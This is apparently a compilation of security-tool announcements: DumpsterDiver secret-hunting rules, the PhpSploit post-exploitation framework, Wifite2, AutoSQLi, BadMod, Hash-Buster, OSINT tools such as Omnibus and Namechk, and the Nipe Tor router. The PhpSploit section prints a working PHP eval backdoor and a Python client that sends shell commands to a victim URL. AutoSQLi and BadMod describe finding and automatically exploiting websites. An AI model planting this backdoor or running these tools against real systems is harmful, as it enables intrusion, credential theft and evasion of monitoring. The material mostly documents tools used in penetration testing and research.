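MAX_KEY_LENGTH = 40
ENTROPY_THRESHOLD = 4.3  # assumption: tune to your false-positive tolerance

def shannon_entropy(s):
    """Shannon entropy in bits per character."""
    counts = Counter(s)
    return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())

def looks_like_secret(token):
    return (MIN_KEY_LENGTH <= len(token) <= MAX_KEY_LENGTH
            and shannon_entropy(token) >= ENTROPY_THRESHOLD)

# The well-known example secret from the AWS documentation scores above the threshold:
print(looks_like_secret("wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"))  # True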

Advanced search:
DumpsterDiver also supports advanced search. Beyond simple grepping with wildcards, this tool allows you to create conditions. Let's assume you're searching for a leak of corporate emails. Additionally, you're interested only in big leaks, which contain at least 100 email addresses. For this purpose you should edit the 'rules.yaml' file in the following way:
filetype: [".*"]
filetype_weight: 0
grep_words: ["*@example.com"]
grep_words_weight: 10
grep_word_occurrence: 100
Let's assume a different scenario: you're looking for the terms "pass", "password", "haslo", "hasło" (if you're analyzing a Polish company's repository) in a .db or .sql file. You can achieve this by modifying the 'rules.yaml' file in the following way:
filetype: [".db", ".sql"]
filetype_weight: 5
grep_words: ["*pass*", "*haslo*", "*hasło*"]
grep_words_weight: 5
grep_word_occurrence: 1
Note that the rule will be triggered only when the total weight (filetype_weight + grep_words_weight) is >=10.
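To make the scoring explicit, here is a small sketch of that rule logic as documented (not DumpsterDiver's actual implementation): the file-extension match and the grep-word match each contribute their weight, and the rule fires only when the total reaches 10.
# Sketch of the documented rule logic, using the second rules.yaml example above.
import fnmatch

rule = {
    "filetype": [".db", ".sql"],
    "filetype_weight": 5,
    "grep_words": ["*pass*", "*haslo*", "*hasło*"],
    "grep_words_weight": 5,
    "grep_word_occurrence": 1,
}

def rule_triggers(filename, content):
    weight = 0
    if any(filename.endswith(ext) for ext in rule["filetype"]):
        weight += rule["filetype_weight"]
    hits = sum(1 for line in content.splitlines()
               if any(fnmatch.fnmatch(line, pattern) for pattern in rule["grep_words"]))
    if hits >= rule["grep_word_occurrence"]:
        weight += rule["grep_words_weight"]
    return weight >= 10

print(rule_triggers("users.sql", "INSERT INTO users VALUES ('bob', 'password123');"))  # True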



PhpSploit - Stealth Post-Exploitation Framework


PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable of maintaining access to a compromised web server for privilege escalation purposes.

Overview
The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
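To see why this one-liner is enough, note that PHP exposes a request header named PHPSPL01T as $_SERVER['HTTP_PHPSPL01T'], so whatever PHP code the client places in that header gets eval()'d. The sketch below only illustrates that raw channel with a placeholder URL; PhpSploit itself obfuscates and encodes its payloads rather than sending them in the clear like this.
# Bare illustration of the header-tunneled channel (not PhpSploit's client).
import requests

target = "http://victim.example/uploads/backdoor.php"  # placeholder URL
php_payload = "echo shell_exec('id');"                 # PHP code eval()'d by the backdoor

resp = requests.get(target, headers={"PHPSPL01T": php_payload})
print(resp.text)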

Features
  • Efficient: More than 20 plugins to automate post-exploitation tasks
    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth: The framework is made by paranoids, for paranoids
    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient: A robust interface with many crucial features
    • Detailed help for any command or option (type help)
    • Cross-platform on both the client and the server.
    • Powerful interface with completion and multi-command support
    • Session saving/loading feature & persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported platforms (as attacker):
  • GNU/Linux
  • Mac OS X

Supported platforms (as target):
  • GNU/Linux
  • BSD Like
  • Mac OS X
  • Windows NT

Wifite 2.1.0 - Automated Wireless Attack Tool


A complete re-write of wifite, a Python script for auditing wireless networks.
Wifite runs existing wireless-auditing tools for you. Stop memorizing command arguments & switches!

What's new in Wifite2?
  • Less bugs
    • Cleaner process management. Does not leave processes running in the background (the old wifite was bad about this).
    • No longer "one monolithic script". Has working unit tests. Pull requests are less-painful!
  • Speed
    • Target access points are refreshed every second instead of every 5 seconds.
  • Accuracy
    • Displays realtime Power level of currently-attacked target.
    • Displays more information during an attack (e.g. % during WEP chopchop attacks, Pixie-Dust step index, etc)
  • Educational
    • The --verbose option (expandable to -vv or -vvv) shows which commands are executed & the output of those commands.
    • This can help debug why Wifite is not working for you. Or so you can learn how these tools are used.
  • Actively developed (as of March 2018).
  • Python 3 support.
  • Sweet new ASCII banner.

What's gone in Wifite2?
  • No more WPS PIN attack, because it can take days on average.
    • However, the Pixie-Dust attack is still an option.
  • Some command-line arguments (--wept, --wpst, and other confusing switches).
    • You can still access some of these, try ./Wifite.py -h -v

What's not new?
  • (Mostly) Backwards compatible with the original wifite's arguments.
  • Same text-based interface everyone knows and loves.

Brief Feature List
  • Reaver (or -bully) Pixie-Dust attack (enabled by-default, force with: --wps-only)
  • WPA handshake capture (enabled by-default, force with: --no-wps)
  • Validates handshakes against pyrit, tshark, cowpatty, and aircrack-ng (when available)
  • Various WEP attacks (replay, chopchop, fragment, hirte, p0841, caffe-latte)
  • Automatically decloaks hidden access points while scanning or attacking.
    • Note: Only works when channel is fixed. Use the -c <channel> switch.
    • Disable this via --no-deauths switch
  • 5GHz support for some wireless cards (via -5 switch).
    • Note: Some tools don't play well on 5GHz channels (e.g. aireplay-ng)
  • Stores cracked passwords and handshakes to the current directory (--cracked)
    • Includes metadata about the access point.
  • Provides commands to crack captured WPA handshakes (--crack)
    • Includes all commands needed to crack using aircrack-ng, john, hashcat, or pyrit.

Linux Distribution Support
Wifite2 is designed specifically for the latest version of Kali's rolling release (tested on Kali 2017.2, updated Jan 2018).
Other pen-testing distributions (such as BackBox) have outdated versions of the tools used by Wifite; these distributions are not supported.

Required Tools
Only the latest versions of these programs are supported:
Required:
  • iwconfig: For identifying wireless devices already in Monitor Mode.
  • ifconfig: For starting/stopping wireless devices.
  • Aircrack-ng suite, includes:
    • aircrack-ng: For cracking WEP .cap files and WPA handshake captures.
    • aireplay-ng: For deauthing access points, replaying capture files, various WEP attacks.
    • airmon-ng: For enumerating and enabling Monitor Mode on wireless devices.
    • airodump-ng: For target scanning & capture file generation.
    • packetforge-ng: For forging capture files.
Optional, but Recommended:
  • tshark: For detecting WPS networks and inspecting handshake capture files.
  • reaver: For WPS Pixie-Dust attacks.
    • Note: Reaver's wash tool can be used to detect WPS networks if tshark is not found.
  • bully: For WPS Pixie-Dust attacks.
    • Alternative to Reaver. Specify --bully to use Bully instead of Reaver.
    • Bully is also used to fetch PSK if reaver cannot after cracking WPS PIN.
  • cowpatty: For detecting handshake captures.
  • pyrit: For detecting handshake captures.

Installing & Running
git clone https://github.com/derv82/wifite2.git
cd wifite2
./Wifite.py

Screenshots
Cracking WPS PIN using reaver's Pixie-Dust attack, then retrieving WPA PSK using bully:


Decloaking & cracking a hidden access point (via the WPA Handshake attack):


Cracking a weak WEP password (using the WEP Replay attack):



AutoSQLi - An Automatic SQL Injection Tool Which Takes Advantage Of Googler, Ddgr, WhatWaf And SQLMap


An Automatic SQL Injection Tool Which Takes Advantage Of ~DorkNet~ Googler, Ddgr, WhatWaf And Sqlmap.

Features
  • Save System - there is a complete save system, which can resume even when your pc crashed. - technology is cool
  • Dorking - from the command line ( one dork ): YES - from a file: NO - from an interactive wizard: YES
  • Waffing - Thanks to Ekultek, WhatWaf now has a JSON output function. - So it's mostly finished :) - UPDATE: WhatWaf is completely working with AutoSQLi. Sqlmap is the next big step
  • Sqlmapping - I'll look if there is some sort of sqlmap API, because I don't wanna use execute this time (: - Sqlmap is cool
  • REPORTING: YES
  • Rest API: NOPE

TODO:
  • Log handling (logging with different levels, cleanly)
  • Translate output (option to translate the save, which is in pickle format, to a json/csv save)
  • Spellcheck (correct wrongly spelled words and conjugational errors. I'm on Neovim right now and there is no auto-spelling check)

The Plan
This plan is a bit outdated, but it will follow this idea:
  1. AutoSQLi will be a python application which will automatically, using a dork provided by the user, return a list of websites vulnerable to SQL injection.
  2. To find vulnerable websites, the user first provides a dork, which is passed to findDorks.py, which returns a list of URLs corresponding to it.
  3. Then, AutoSQLi will do some very basic checks ( TODO: MAYBE USING SQLMAP AND ITS --smart and --batch functions ) to verify if the application is protected by a WAF, or if one of its parameters is vulnerable.
  4. Sometimes, websites are protected by a Web Application Firewall, or in short, a WAF. To identify and get around these WAFs, AutoSQLi will use WhatWaf.
  5. Finally, AutoSQLi will exploit the website using sqlmap, and give the user the choice to do whatever they want!

Tor
Also, AutoSQLi should work using Tor by default. So it should check for Tor availability on startup.


SleuthQL - Burp History Parsing Tool To Discover Potential SQL Injection Points


SleuthQL is a python3 script to identify parameters and values that contain SQL-like syntax. Once identified, SleuthQL will then insert SQLMap identifiers (*) into each parameter where the SQL-esque variables were identified.
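The core idea can be sketched in a few lines: scan each query parameter's name and value for SQL-looking tokens and append SQLMap's * marker to anything suspicious. The keyword list below is illustrative and much smaller than SleuthQL's actual rule set.
# Minimal sketch of the idea behind SleuthQL (illustrative keyword list).
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

SQL_HINTS = re.compile(
    r"\b(select|union|order\s*by|group\s*by|from|where|insert|delete)\b|--|%27|'",
    re.IGNORECASE)

def mark_suspect_params(url):
    parts = urlsplit(url)
    marked = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if SQL_HINTS.search(name) or SQL_HINTS.search(value):
            value += "*"   # SQLMap's custom injection point marker
        marked.append((name, value))
    return urlunsplit(parts._replace(query=urlencode(marked, safe="*")))

print(mark_suspect_params("https://example.com/items?orderby=name+asc&query=select+id"))
# https://example.com/items?orderby=name+asc*&query=select+id*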

Supported Request Types
SleuthQL requires an export of Burp's Proxy History. To generate this export, simply navigate to your proxy history tab, highlight every item and click "Save Items". Ensure that each request is saved using base64 encoding. When SleuthQL scans the proxy history file, outside of the regular URL parameters, it will be able to identify vulnerable parameters from the following request content-types:
  • application/json
  • application/x-www-form-urlencoded
  • multipart/form-data
There are cases where this tool will break down. Namely, if there are nested content-types (such as a base64-encoded parameter within JSON data), it will not be able to identify those parameters. It also does not cover cookies, as too often something such as CloudFlare will flag a parameter we're not interested in.

Why not Burp Pro?
Burp Pro's scanner is great, but isn't as full-featured as SQLMap. Thus, if we can prioritize requests to feed into SQLMap in a batch-like manner and look for results this way, we can increase the detection rate of SQL injection.

Usage
Usage: 
[ASCII art banner: SleuthQL - SQL Injection Discovery Tool - Rhino Security Labs - Dwight Hohnstein]

sleuthql.py -d example.com -f burpproxy.xml

SleuthQL is a script for automating the discovery of requests matching
SQL-like parameter names and values. When discovered, it will display
any matching parameters and paths that may be vulnerable to SQL injection.
It will also create a directory with SQLMap ready request files.



Options:
  -h, --help            show this help message and exit
  -d DOMAINS, --domains=DOMAINS
                        Comma separated list of domains to analyze. i.e.:
                        google.com,mozilla.com,rhinosecuritylabs.com
  -f PROXY_XML, --xml=PROXY_XML
                        Burp proxy history xml export to parse. Must be base64
                        encoded.
  -v, --verbose         Show verbose errors that occur during parsing of the
                        input XML.

Output Files
For each potentially vulnerable request, the SQLMap parameterized request will be saved under $(pwd)/$domain/ as text files.

Video Demo



Namechk - Osint Tool Based On Namechk.Com For Checking Usernames On More Than 100 Websites, Forums And Social Networks


Osint tool based on namechk.com for checking usernames on more than 100 websites, forums and social networks.
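The underlying technique is straightforward: request a profile URL for the username on each site and interpret the HTTP response (a 404 usually means the name is free). The sketch below is only an illustration with two example URL patterns; the real script covers 100+ sites, many of which need site-specific handling.
# Illustrative username check (two example sites; not the namechk.sh logic).
import requests

SITES = {
    "github": "https://github.com/{}",
    "reddit": "https://www.reddit.com/user/{}",
}

def check(username):
    for site, pattern in SITES.items():
        r = requests.get(pattern.format(username), timeout=10,
                         headers={"User-Agent": "Mozilla/5.0"})
        status = "available" if r.status_code == 404 else "taken / unknown"
        print("%-10s %s -> %s" % (site, r.status_code, status))

check("someusername123")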

Use:
  • Search available username:
    ./namechk.sh <username> -au

  • Search available username on specifics websites:
    ./namechk.sh <username> -au -co

  • Search available username list:
    ./namechk.sh -l -au

  • Search used username:
    ./namechk.sh <username> -fu

  • Search used username on specifics websites:
    ./namechk.sh <username> -fu -co

  • Search used username list:
    ./namechk.sh -l -fu

Tested webs



Msploitego - Pentesting Suite For Maltego Based On Data In A Metasploit Database


msploitego leverages the data gathered in a Metasploit database by enumerating and creating specific entities for services. Services like samba, smtp, snmp, http have transforms to enumerate even further. Entities can either be loaded from a Metasploit XML file or taken directly from the Postgres msf database.

Requirements
  • Python 2.7
  • Has only been tested on Kali Linux
  • software installations:
    • Metasploit
    • nmap
    • enum4linux
    • smtp-check
    • nikto

Installation
  • checkout and update the transform path inside Maltego
  • In Maltego import config from msploitego/src/msploitego/resources/maltego/msploitego.mtz

General Use

Using exported Metasploit xml file
  • run a db_nmap scan in metasploit, or import a previous scan
    • msf> db_nmap -vvvv -T5 -A -sS -ST -Pn
    • msf> db_import /path/to/your/nmapfile.xml
    • export the database to an xml file
    • msf> db_export -f xml /path/to/your/output.xml
    • In Maltego drag a MetasploitDBXML entity onto the graph.
    • Update the entity with the path to your metasploit database file.
    • run the MetasploitDB transform to enumerate hosts.
    • from there several transforms are available to enumerate services, vulnerabilities stored in the metasploit DB

Using Postgres
  • drag and drop a Postgresql DB entity onto the canvas, enter DB details.
  • run the Postgresql transforms directly against a running DB

Notes
  • Instead of running a nikto scan directly from Maltego, I've opted to include a field for a Nikto XML file. Nikto can take a long time to run, so it's best to manage that directly from the OS.

Screenshots



TODO's
  • Connect directly to the postgres database - in progress
  • Many, many more transforms for actions on generated entities.


Hash-Buster v2.0 - Tool Which Uses Several APIs To Perform Hash Lookups


Features
  • Automatic hash type identification
  • Supports MD5, SHA1, SHA2
  • Can extract & crack hashes from a file
  • Can find hashes from a directory, recursively
  • 6 robust APIs

As powerful as Hulk, as intelligent as Bruce Banner

Single Hash
You don't need to specify the hash type. Hash Buster will identify and crack it in under 3 seconds.

Cracking hashes from a file
Hash Buster can find your hashes even if they are stored in a file like this:
simple@gmail.com:21232f297a57a5a743894a0e4a801fc3
{"json@gmail.com":"d033e22ae348aeb5660fc2140aec35850c4da997"}
surrondedbytext8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918surrondedbytext
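The identification and extraction steps described above boil down to pulling hex runs out of arbitrary text and labelling them by length (32 = MD5, 40 = SHA1, 64 = SHA2-256). A minimal sketch of that idea (not Hash Buster's actual code):
# Extract hex strings from text and label them by length.
import re

HASH_LENGTHS = {32: "MD5", 40: "SHA1", 64: "SHA2-256"}
HEX_RUN = re.compile(r"\b[a-fA-F0-9]{32,64}\b")

def find_hashes(text):
    for match in HEX_RUN.findall(text):
        kind = HASH_LENGTHS.get(len(match))
        if kind:
            yield kind, match

sample = 'simple@gmail.com:21232f297a57a5a743894a0e4a801fc3\n' \
         '{"json@gmail.com":"d033e22ae348aeb5660fc2140aec35850c4da997"}'
for kind, value in find_hashes(sample):
    print(kind, value)
Note that the word-boundary regex above will not catch the third, fully embedded example; a looser pattern (at the cost of more false positives) is needed for that case.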

Finding hashes from a directory
Yep, just specify a directory and Hash Buster will go through all the files and directories present in it, looking for hashes.

Installation & Usage
You can install Hash-Buster with the following command:
make install
Cracking a single hash
buster -s <hash>
Cracking hashes from a file
buster -f /root/hashes.txt
Finding hashes from a directory
buster -d /root/Documents
Note: Please don't add / at the end of the directory



BadMod v2.0 - Detect Website CMS, Website Scanner & Auto Exploiter


Auto exploiter & Bing dorker, with an option to get all sites on a server.

Version 2.0
  • Fixed colors bug
  • Fixed permissions bug
  • Added new option to scan single target
  • Added new option to scan Joomla & WordPress plugins

Installation
  • Install tool
  • git clone https://github.com/MrSqar-Ye/BadMod.git
  • Install php
  • sudo apt-get install php
  • Install php curl
  • sudo apt-get install php-curl


Screen shots

Installation
  • Install tool
  • chmod +x INSTALL
    ./INSTALL

Option 1 - Get all server sites
  • Fast tool to get all server sites.

Option 2 - generate random IPs


Video



Gpredict - Satellite Tracking Application


Gpredict is a real-time satellite tracking and orbit prediction application. It can track a large number of satellites and display their position and other data in lists, tables, maps, and polar plots (radar view). Gpredict can also predict the time of future passes for a satellite, and provide you with detailed information about each pass.

Gpredict is different from other satellite tracking programs in that it allows you to group the satellites into visualisation modules. Each of these modules can be configured independently from the others, giving you unlimited flexibility concerning the look and feel of the modules. Naturally, Gpredict will also allow you to track satellites relative to different observer locations - at the same time.

Gpredict is free software licensed under the GNU General Public License. This gives you the freedom to use and modify gpredict to suit your needs. Gpredict is available as a source package as well as precompiled binaries via third parties.

Features:
  • Fast and accurate real-time satellite tracking using the NORAD SGP4/SDP4 algorithms.
  • No software limit on the number of satellites or ground stations.
  • Appealing visual presentation of the satellite data using maps, tables and polar plots (radar views).
  • Allows you to group satellites into modules, each module having its own visual layout, and being customisable on its own. Of course, you can use several modules at the same time.
  • Radio and antenna rotator control for autonomous tracking.
  • Efficient and detailed predictions of future satellite passes. Prediction parameters and conditions can be fine-tuned by the user to allow both general and very specialised predictions.
  • Context sensitive pop-up menus allow you to quickly predict future passes by clicking on any satellite.
  • Exhaustive configuration options allowing advanced users to customise both the functionality and look & feel of the program.
  • Automatic updates of the Keplerian Elements from the web via HTTP, FTP, or from local files.
  • Robust design and multi-platform implementation integrates gpredict well into modern computer desktop environments, including Linux, BSD, Windows, and Mac OS X.
  • Free software licensed under the terms and conditions of the GNU General Public License allowing you to freely use it, learn from it, modify it, and re-distribute it.
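Gpredict itself is a C/GTK application, but to get a feel for what the SGP4 propagator mentioned in the first bullet actually computes, the independent Python sgp4 package implements the same model. A minimal sketch (the ISS two-line element set is the sample from the sgp4 package documentation; use a current TLE for real work):

from sgp4.api import Satrec, jday

# Sample ISS TLE taken from the sgp4 package docs - replace with a current element set.
line1 = "1 25544U 98067A   19343.69339541  .00001764  00000-0  40967-4 0  9997"
line2 = "2 25544  51.6439 211.2001 0007417  17.6667  85.6398 15.50103472202482"

satellite = Satrec.twoline2rv(line1, line2)

# Propagate to a UTC time, expressed as a Julian date split into whole and fractional parts.
jd, fr = jday(2019, 12, 9, 12, 0, 0)
error_code, position_km, velocity_km_s = satellite.sgp4(jd, fr)

if error_code == 0:
    # Coordinates are in the TEME Earth-centred inertial frame.
    print("Position (km):  ", position_km)
    print("Velocity (km/s):", velocity_km_s)

Gpredict layers pass prediction, observer geometry and the visual modules on top of this propagation step.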

Screenshots:








Omnibus - Open Source Intelligence Collection, Research, And Artifact Management

An Omnibus is defined as a volume containing several novels or other items previously published separately and that is exactly what the InQuest Omnibus project intends to be for Open Source Intelligence collection, research, and artifact management.
By providing an easy to use interactive command line application, users are able to create sessions to investigate various artifacts such as IP addresses, domain names, email addresses, usernames, file hashes, Bitcoin addresses, and more as we continue to expand.
This project has taken motivation from the greats that came before it such as SpiderFoot, Harpoon, and DataSploit. Much thanks to those great authors for contributing to the world of open source.
The application is written with Python 2.7 in mind and has been successfully tested on OSX and Ubuntu 16.04 environments.
As this is a pre-release of the final application, there will very likely be some bugs and uncaught exceptions or other weirdness during usage. Though for the most part, it is fully functional and can be used to begin OSINT investigations right away.

Vocabulary
Before we begin we'll need to cover some terminology used by Omnibus.
  • Artifact:
    • An item to investigate
    • Artifacts can be created in two ways:
      • Using the new command or by being discovered through module execution
  • Session:
    • Cache of artifacts created after starting the Omnibus CLI
    • Each artifact in a session is given an ID to quickly identify and retrieve the artifact from the cache
    • Commands can be executed against an artifact either by providing its name or its corresponding session ID
  • Module:
    • Python script that performs some arbitrary OSINT task against an artifact

Running Omnibus
Starting up Omnibus for investigation is as simple as cloning this GitHub repository, installing the Python requirements with pip install -r requirements.txt, and running python2.7 omnibus-cli.py.

Omnibus Shell - Main Startup

For a visual reference of the CLI, pictured above is the Omnibus console after a new session has been started, 2 artifacts have been added to a session, and the help menu is shown.

API Keys
You must set any API keys you'd like to use within modules inside the omnibus/etc/apikeys.json file. This file is a JSON document with placeholders for all the services which require API keys, and is only accessed by Omnibus on a per module basis to retrieve the exact API key a module needs to execute.
It should be noted that most of the services requiring API keys have free accounts and API keys. Some free accounts may have lower resource limits, but that hasn't been a problem during smaller daily investigations or testing the application.
A handy tip: Use the cat apikeys command to view which keys you do in fact have stored. If modules are failing, check here first to ensure your API key is properly saved.

Interactive Console
When you first run the CLI, you'll be greeted by a help menu with some basic information. We tried to build the command line script to mimic some common Linux console commands for ease of use. Omnibus provides commands such as cat to show information about an artifact, rm to remove an artifact from the database, ls to view current session artifacts, and so on.
One additional feature of note is the use of the > character for output redirection. For example, if you wish to retrieve the details of an artifact named "inquest.net" saved to a JSON file on your local disk you'd simply run the command: cat inquest.net > inquest-report.json and there it would be! This feature also works with full file paths instead of relative paths.
The high level commands you really need to know to use Omnibus are:
  • session
    • start a new session
  • new <artifact name>
    • create a new artifact for investigation
  • modules
    • display list of available modules
  • open <file path>
    • load a text file list of artifacts into Omnibus as artifacts
  • cat <artifact name | session id>
    • view beautified JSON database records
  • ls
    • show all active artifacts
  • rm
    • remove an artifact from the database
  • wipe
    • clear the current artifact session
Also, if you ever need a quick reference on the different commands available for different areas of the application, there are sub-help menus for this exact purpose. Using these commands will show you only the commands relevant to a specific area:
  • general
    • overall commands such as help, history, quit, set, clear, banner, etc.
  • artifacts
    • display commands specific to artifacts and their management
  • sessions
    • display helpful commands around managing sessions
  • modules
    • show a list of all available modules

Artifacts

Overview
Most cyber investigations begin with one or more technical indicators, such as an IP address, file hash or email address. After searching and analyzing, relationships begin to form and you can pivot through connected data points. These data points are called Artifacts within Omnibus and represent any item you wish to investigate.
Artifacts can be one of the following types:
  • IPv4 address
  • FQDN
  • Email Address
  • Bitcoin Address
  • File Hash (MD5, SHA1, SHA256, SHA512)
  • User Name

Creating & Managing Artifacts
The command "new" followed by an artifact will create that artifact within your Omnibus session and store a record of the artifact within MongoDB. This record holds the artifact name, type, subtype, module results, source, notes, tags, children information (as needed) and time of creation. Every time you run a module against a created or stored artifact, the database document will be updated to reflect the newly discovered information.
To create a new artifact and add it to MongoDB for tracking, run the command new <artifact name>. For example, to start investigating the domain deadbits.org, you would run new deadbits.org.
Omnibus will automatically determine what type the artifact is and ensure that only modules for that type are executed against the artifact.
When a module runs, new artifacts may be found during the discovery process. For example, running the "dnsresolve" command might find new IPv4 addresses not previously seen by Omnibus. If this is the case, those newly found artifacts are automatically created as new artifacts in Omnibus and linked to their parent with an additional field called "source" to identify the module from which they were originally found.
Artifacts can be removed from the database using the "delete" command. If you no longer need an artifact, simply run the delete command and specify the artifact's name or, if it has one, its session ID.
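This is not Omnibus's actual schema or code, but a minimal sketch of the flow described above - guess the artifact type, build a document with the fields listed, and store it in MongoDB with pymongo (the collection name, field names and detection heuristics here are assumptions):

import re
from datetime import datetime
from pymongo import MongoClient

# Rough type heuristics for illustration only - not Omnibus's real detection logic.
def guess_type(name):
    if re.fullmatch(r"(\d{1,3}\.){3}\d{1,3}", name):
        return "ipv4"
    if re.fullmatch(r"[^@\s]+@[^@\s]+\.[^@\s]+", name):
        return "email"
    if re.fullmatch(r"([a-fA-F0-9]{32}|[a-fA-F0-9]{40}|[a-fA-F0-9]{64}|[a-fA-F0-9]{128})", name):
        return "hash"
    if "." in name:
        return "fqdn"
    return "user"

def new_artifact(name, source="cli"):
    client = MongoClient("localhost", 27017)         # assumed local MongoDB
    doc = {
        "name": name,
        "type": guess_type(name),
        "subtype": None,
        "data": {},           # module results accumulate here
        "source": source,
        "notes": [],
        "tags": [],
        "children": [],
        "created": datetime.utcnow(),
    }
    client["omnibus"]["artifacts"].insert_one(doc)    # assumed db/collection names
    return doc

print(new_artifact("deadbits.org"))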

Sessions
Omnibus makes use of a feature called "sessions". Sessions are temporary caches created via Redis each time you start a CLI session. Every time you create an artifact, that artifact's name is added to the session along with a numeric key that makes for easy retrieval, searching, and action against the related artifact. For example, if your session held one item, "inquest.net", instead of needing to execute virustotal inquest.net you could also run virustotal 1 and you would receive the same results. In fact, this works with any module or command that takes an artifact name as its first argument.
Sessions are here for easy access to artifacts and will be cleared each time you quit the command line session. If you wish to clear the session early, run the command "wipe" and you'll get a clean slate.
Eventually, we would like to add a Cases portion to Omnibus that allows users to create cases of artifacts, move between them, and maintain a more coherent OSINT management platform. Though for this current pre-release, we will be sticking with the Session. :)
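Again as a sketch rather than Omnibus's real code, a Redis-backed session cache that hands out numeric IDs for artifact names could look roughly like this (the key layout is an assumption):

import redis

# Toy session cache: each new artifact gets an incrementing numeric ID so commands
# can accept either the name or the ID. Key names here are assumed, not Omnibus's.
r = redis.StrictRedis(host="localhost", port=6379, db=0, decode_responses=True)

def session_add(name):
    session_id = r.incr("session:counter")
    r.set("session:%d" % session_id, name)
    return session_id

def session_resolve(name_or_id):
    if str(name_or_id).isdigit():
        return r.get("session:%s" % name_or_id) or str(name_or_id)
    return name_or_id

def session_wipe():
    for key in r.scan_iter("session:*"):
        r.delete(key)

sid = session_add("inquest.net")
print(sid, "->", session_resolve(sid))   # virustotal 1 behaves like virustotal inquest.net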

Interacting with Session IDs instead of Artifact names



Modules
Omnibus currently supports the following list of modules. If you have suggestions for modules or would like to write one of your own, please create a pull request.
Also, within the Omnibus console, typing the module name will show you the Help information associated with that module.

Modules
  • Blockchain.info
  • Censys
  • ClearBit
  • Cymon
  • DNS subdomain enumeration
  • DNS resolution
  • DShield (SANS ISC)
  • GeoIP lookup
  • Full Contact
  • Gist Scraping
  • GitHub user search
  • HackedEmails.com email search
  • Hurricane Electric host search
  • HIBP search
  • Hunter.io
  • IPInfo
  • IPVoid
  • KeyBase
  • Nmap
  • PassiveTotal
  • Pastebin
  • PGP Email and Name lookup
  • RSS Feed Reader
  • Shodan
  • Security News Reader
  • ThreatCrowd
  • ThreatExpert
  • TotalHash
  • Twitter
  • URLVoid
  • VirusTotal
  • Web Recon
  • WHOIS
As these modules are a work in progress, some may not yet work as expected but this will change over the coming weeks as we hope to officially release version 1.0 to the world!

Machines
Machines are a simple way to run all available modules for an artifact type against a given artifact. This is a fast way to gather as much information on a target as possible using a single command.
To perform this, simply run the command machine <artifact name|session ID> and wait a few minutes until the modules are finished executing.
The only caveat is that this may return a large volume of data and child artifacts depending on the artifact type and the results per module. To remedy this, we are investigating a way to remove specific artifact fields from the stored database document to make it easier for users to prune unwanted data.

Quick Reference Guide
Some quick commands to remember are:
  • session - start a new artifact cache
  • cat <artifact name>|apikeys - pretty-print an artifact's document or view your stored API keys
  • open <file path> - load a text file list of artifacts into Omnibus for investigation
  • new <artifact name> - create a new artifact and add it to MongoDB and your session
  • find <artifact name> - check if an artifact exists in the db and show the results

Reporting
Reports are the JSON output of an artifact's database document, essentially a text file version of the output of the "cat" command. By using the report command you may specify an artifact and a filepath you wish to save the output to:
  • omnibus >> report inquest.net /home/adam/intel/osint/reports/inq_report.json
The above command overrides the standard report directory of omnibus/reports. By default, and if you do not specify a report path, all reports will be saved to that location. Also, if you do not specify a file name, the report will use the following format:
  • [artifact_name]_[timestamp].json

Redirection
The output of commands can also be saved to arbitrary text files using the standard Linux character >. For example, if you wish to store the output of a VirusTotal lookup for a host to a file called "vt-lookup.json" you would simply execute:
  • virustotal inquest.net > vt-lookup.json
By default, redirected output files are saved in the current working directory ("omnibus/"), but if you specify a full path such as virustotal inquest.net > /home/adam/intel/cases/001/vt-lookup.json the JSON-formatted output will be saved there.

Monitoring Modules
Omnibus will soon be offering the ability to monitor specific keywords and regex patterns across different sources. Once a match is found, an email or text message alert could be sent to the user to inform them on the discovery. This could be leveraged for real-time threat tracking, identifying when threat actors appear on new forums or make a fresh Pastebin post, or simply to stay on top of the current news.
Coming monitors include:
  • RSS monitor
  • Pastebin monitor
  • Generic Pastesite monitoring
  • Generic HTTP/JSON monitoring


Nipe - A Script To Make TOR Network Your Default Gateway


Tor enables users to surf the Internet, chat and send instant messages anonymously, and is used by a wide variety of people for both licit and illicit purposes. Tor has, for example, been used by criminal enterprises, hacktivist groups, and law enforcement agencies at cross purposes, sometimes simultaneously.

Nipe is a script that makes the Tor network your default gateway.

This Perl script routes all of your computer's traffic through the Tor network, letting you surf the Internet anonymously without having to worry about being tracked or traced back.

Download and install:
    git clone https://github.com/GouveaHeitor/nipe
cd nipe
cpan install Switch JSON LWP::UserAgent

Commands:
    COMMAND     FUNCTION
    install     Install dependencies
    start       Start routing
    stop        Stop routing
    restart     Restart the Nipe process
    status      See status

Examples:

perl nipe.pl install
perl nipe.pl start
perl nipe.pl stop
perl nipe.pl restart
perl nipe.pl status
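Nipe itself is Perl, but once routing is started it is worth confirming that traffic really leaves through Tor. One quick, unofficial check (assuming Python and the requests library are available) is to query the Tor Project's exit-check endpoint:

import requests

# Unofficial sanity check: check.torproject.org reports whether the requesting IP
# is a known Tor exit. Run this after "perl nipe.pl start".
response = requests.get("https://check.torproject.org/api/ip", timeout=15)
info = response.json()
print("Exit IP:", info.get("IP"))
print("Routed through Tor:", info.get("IsTor"))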

Bugs

Rastrea2R - Collecting & Hunting For IOCs With Gusto And Style


